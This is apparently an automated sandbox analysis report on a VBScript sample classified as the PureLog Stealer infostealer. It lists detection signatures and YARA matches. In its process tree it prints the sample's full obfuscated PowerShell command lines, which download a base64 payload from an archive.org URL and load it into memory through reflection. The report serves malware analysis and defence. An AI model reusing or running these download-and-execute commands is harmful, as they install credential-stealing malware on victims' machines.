Edit tour
Windows
Analysis Report
aK7smea2Vv.vbs
Overview
General Information
Sample name: | aK7smea2Vv.vbsrenamed because original name is a hash value |
Original sample name: | 5ae8ef220711cf775ea5b5e8a93db4e2a88829709cf68e1a810f47229fdba903.vbs |
Analysis ID: | 1523831 |
MD5: | 1c640c5256d9b20ca3693754dadea139 |
SHA1: | 025616236d051812117c1b2e482fb715f0e1cc94 |
SHA256: | 5ae8ef220711cf775ea5b5e8a93db4e2a88829709cf68e1a810f47229fdba903 |
Tags: | BlindEaglevbsuser-JAMESWT_MHT |
Infos: | |
Detection
PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Powershell Download and Execute IEX
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7384 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\aK7sm ea2Vv.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7472 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCdEQzcnKy d1cmwgPSBr ZicrJ3NodH RwczovL2kn KydhNjAwMT AwJysnLnVz JysnLmFyY2 hpdmUub3Jn LycrJzI0L2 l0JysnZW1z L2RldGEnKy doLW5vdGUt Jysndi9EZX RhaE4nKydv JysndGVWLn R4dGtmJysn cztEQzdiYX NlNjRDb250 ZW50ID0gJy snKE5ldy1P YmplY3QgJy snU3lzdGVt Lk5lJysndC 5XZScrJ2In KydDbGllbn QpLicrJ0Rv d25sb2FkU3 RyaW4nKydn KERDN3VybC knKyc7Jysn REM3YmluYX J5Q29udGVu dCA9IFtTeX N0JysnZW0n KycuQ29udm VydF06Jysn OkZybycrJ2 1CYXNlNjRT dHJpbmcnKy coREM3YmFz ZTY0Q29udG VudCk7REM3 YXNzZW1iJy snbHknKycg PSBbUicrJ2 VmbGUnKydj dGlvbi5BJy snc3NlbWJs JysneV06Ok xvYWQoREM3 JysnYmluJy snYXJ5Qycr J29uJysndG VudCknKyc7 REM3dHknKy dwZScrJyA9 IERDN2Fzc2 VtYmx5Lkdl dFR5cGUoa2 ZzUicrJ3Vu UCcrJ0UnKy cuSG9tJysn ZWtmcyk7RE M3JysnbScr J2V0aG9kJy snID0nKycg REM3dHlwJy snZScrJy4n KydHZXQnKy dNZXQnKydo b2QoJysna2 ZzVicrJ0En KydJaycrJ2 ZzJysnKTtE QzdtZScrJ3 Rob2QnKycu SW52b2tlKE RDJysnN251 bGwsJysnIF tvYmplY3Rb XV1AKGsnKy dmc3R4dC4n KydGRFInKy dXLzA2NS82 JysnNTEuMD kxLicrJzk3 LjU0Ly86cH R0aCcrJ2tm cyAsIGtmc2 Rlc2F0aXZh ZG9rZnMgLC BrZnNkZXNh dGl2JysnYW QnKydvaycr J2YnKydzJy snICcrJywg a2ZzZGVzYX QnKydpJysn dmFkbycrJ2 tmcyxrZnMn KydSZWdBc2 1rZnMnKycs a2ZzJysna2 ZzKScrJykn KS5yRVBMQU NFKChbY2hB cl02OCtbY2 hBcl02Nytb Y2hBcl01NS ksW1NUUklO R11bY2hBcl 0zNikuckVQ TEFDRSgna2 ZzJyxbU1RS SU5HXVtjaE FyXTM5KXwg aUVY';$OWj uxd = [sys tem.Text.e ncoding]:: UTF8.GetSt ring([syst em.Convert ]::Frombas e64String( $codigo)); powershell .exe -wind owstyle hi dden -exec utionpolic y bypass - NoProfile -command $ OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7480 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7612 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "('DC7 '+'url = k f'+'shttps ://i'+'a60 0100'+'.us '+'.archiv e.org/'+'2 4/it'+'ems /deta'+'h- note-'+'v/ DetahN'+'o '+'teV.txt kf'+'s;DC7 base64Cont ent = '+'( New-Object '+'System .Ne'+'t.We '+'b'+'Cli ent).'+'Do wnloadStri n'+'g(DC7u rl)'+';'+' DC7binaryC ontent = [ Syst'+'em' +'.Convert ]:'+':Fro' +'mBase64S tring'+'(D C7base64Co ntent);DC7 assemb'+'l y'+' = [R' +'efle'+'c tion.A'+'s sembl'+'y] ::Load(DC7 '+'bin'+'a ryC'+'on'+ 'tent)'+'; DC7ty'+'pe '+' = DC7a ssembly.Ge tType(kfsR '+'unP'+'E '+'.Hom'+' ekfs);DC7' +'m'+'etho d'+' ='+' DC7typ'+'e '+'.'+'Get '+'Met'+'h od('+'kfsV '+'A'+'Ik' +'fs'+');D C7me'+'tho d'+'.Invok e(DC'+'7nu ll,'+' [ob ject[]]@(k '+'fstxt.' +'FDR'+'W/ 065/6'+'51 .091.'+'97 .54//:ptth '+'kfs , k fsdesativa dokfs , kf sdesativ'+ 'ad'+'ok'+ 'f'+'s'+' '+', kfsde sat'+'i'+' vado'+'kfs ,kfs'+'Reg Asmkfs'+', kfs'+'kfs) '+')').rEP LACE(([chA r]68+[chAr ]67+[chAr] 55),[STRIN G][chAr]36 ).rEPLACE( 'kfs',[STR ING][chAr] 39)| iEX" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |